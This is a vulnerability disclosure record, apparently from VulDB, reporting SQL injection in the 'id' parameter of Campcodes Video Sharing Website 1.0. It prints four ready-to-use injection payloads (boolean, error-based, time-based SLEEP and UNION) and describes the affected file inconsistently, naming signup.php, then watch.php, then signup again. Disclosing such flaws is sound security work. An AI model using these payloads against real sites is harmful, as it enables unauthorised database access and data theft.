| Title | SQL injection vulnerability exists in Video Sharing Website |
|---|
| Description | SQL injection vulnerability exists in id parameter of signup.php file of Video Sharing Website
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit index.php and page parameter is ‘watch’,it will include watch.php,and id parameter can do sql injection.
Payload:
id=4/(3*2-5) AND 6049=6049&page=signup
or
id=(SELECT 3638 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(3638=3638,1))),0x71706a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&page=signup
or
id=4/(3*2-5) AND (SELECT 3130 FROM (SELECT(SLEEP(5)))puzr)&page=signup
or
id=-8745 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787071,0x727a724e6745556d4849654c546d766f6b4645526f78706a4877484d6e75696e4e50444f5271645a,0x71706a7a71),NULL,NULL,NULL-- -&page=signup |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%203.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
|---|
| Submission | 04/14/2023 06:10 (3 years ago) |
|---|
| Moderation | 04/14/2023 08:21 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225913 [Campcodes Video Sharing Website 1.0 signup.php ID sql injection] |
|---|
| Points | 20 |
|---|